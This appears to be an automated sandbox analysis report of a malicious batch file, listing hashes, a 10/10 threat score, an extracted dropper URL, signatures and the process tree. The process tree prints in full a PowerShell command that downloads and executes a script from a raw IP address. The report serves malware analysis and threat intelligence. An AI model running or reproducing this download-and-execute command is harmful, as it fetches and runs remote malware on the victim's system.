Analysis

  • max time kernel
    122s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    05-06-2020 13:10

General

  • Target

    33f14d49b75ebbcfae41baae23087024.bat

  • Size

    215B

  • MD5

    b8e6cda7825e3b0e91da48bf974c6f75

  • SHA1

    c4cda1c0a376e6de07323a2b5d9ff388735dee66

  • SHA256

    4ce493a2f1b9b9fe548d1aa4b4355f76c7ec0c3402da758cdca52288300b6f63

  • SHA512

    3bfad04872fa35e5b1895719cfa2e5b38149c97a623526de13b22d51060831f25371b30e1155512a700ecab4ef809825cd575a2bacd4637ba5d50a86d684dd65

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\33f14d49b75ebbcfae41baae23087024.bat"
    1⤵
      PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024');Invoke-TOSTCDSD;Start-Sleep -s 10000"
        2⤵
          PID:1344
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 700
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1712

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1712-0-0x0000000004860000-0x0000000004861000-memory.dmp

        Filesize

        4KB

      • memory/1712-1-0x0000000004F90000-0x0000000004F91000-memory.dmp

        Filesize

        4KB